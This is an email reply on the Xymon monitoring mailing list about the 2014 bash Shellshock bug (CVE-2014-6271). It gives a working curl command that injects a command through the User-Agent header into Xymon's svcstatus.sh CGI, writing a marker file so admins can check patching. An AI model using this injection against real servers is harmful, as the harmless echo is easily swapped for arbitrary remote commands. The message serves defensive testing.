<html><head><style type='text/css'>p { margin: 0; }</style></head><body><div style='font-family: Courier; font-size: 12pt; color: #006600'>Oh, yes, very terrible.<br><br>And if you want to test to see that you are vulnerable through Xymon, you can try this harmless exploit:<br><blockquote>your_workstation$ curl -k -H 'User-Agent: () { :;}; echo vulnerable>/tmp/test-xymon-shellshock' http://your_xymon_server/xymon-cgi/svcstatus.sh<br><html><head><title>Invalid request</title></head><br><body>Invalid request</body></html><br>your_workstation$ ssh your_xymon_server 'cat /tmp/test-xymon-shellshock'<br>vulnerable<br>your_workstation$ <br></blockquote>...which creates a file (if you are vulnerable) in your Xymon server '/tmp/':<br><blockquote>your_workstation$ ssh your_xymon_server 'cat /tmp/test-xymon-shellshock'<br>vulnerable<br>your_workstation$ <br></blockquote>...so then, you can verify before and after patching.<br><br><br>cheers,<br><br>Troy<br><br><br><br>----- Original Message -----<br>From: "J.C. Cleaver" <cleaver@terabithia.org><br>To: xymon@xymon.com<br>Sent: Wednesday, September 24, 2014 11:54:35 AM GMT -07:00 US/Canada Mountain<br>Subject: [Xymon] FYI: CVE-2014-6271 - bash vulnerability<br><br>This is an important one to patch your systems on, if you haven't already.<br><br>The xymon CGI interface runs via shell wrappers around the actual C cgi<br>code (to set the environment properly), which means this would be an<br>avenue for attack.<br><br>Alternatively, using /bin/dash or some other shell besides bash (often<br>/bin/sh on Linux distros) is another work around. (This is the default on<br>the Terabithia RPMS for EL6.)<br><br><br>More info:<br>http://seclists.org/oss-sec/2014/q3/650<br><br>https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/<br>https://access.redhat.com/articles/1200223<br><br><br>Regards,<br>-jc<br><br>_______________________________________________<br>Xymon mailing list<br>Xymon@xymon.com<br>http://lists.xymon.com/mailman/listinfo/xymon<br></div>
<br><p>
<hr width=80% align=center>
This communication is intended for the use of the recipient to whom it
is addressed, and may contain confidential, personal, and or privileged
information. Please contact us immediately if you are not the intended
recipient of this communication, and do not copy, distribute, or take
action relying on it. Any communications received in error, or
subsequent reply, should be deleted or destroyed.
<hr width=80% align=center>
</p>
<br></body></html>